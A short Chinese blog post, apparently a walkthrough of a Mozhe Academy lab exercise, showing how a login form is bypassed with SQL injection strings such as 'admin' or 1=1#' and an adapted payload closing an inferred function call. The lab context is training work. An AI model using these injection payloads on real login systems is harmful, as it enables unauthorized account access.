墨者学院-SQL过滤字符后手工绕过漏洞测试(万能口令)

2019-07-19  本文已影响0人  nohands_noob

靶场地址:
https://www.mozhe.cn/bug/detail/VlhJTTJsUm9BSmFEQlE3SEpldDBIQT09bW96aGUmozhe

用户名输入 admin' or 1=1#,密码随意输入


看不出为什么报错,接着用户名输入 admin',密码随意输入


可以看到sql语句似乎执行了什么函数,大概是xxx('admin','a','a') and password='123'

根据推断重新构造注入
用户名输入 admin','a','a') or 1=1#,密码随意输入


成功绕过密码登录(所以题目说的过滤字符到底过滤了什么?)

上一篇 下一篇

猜你喜欢

热点阅读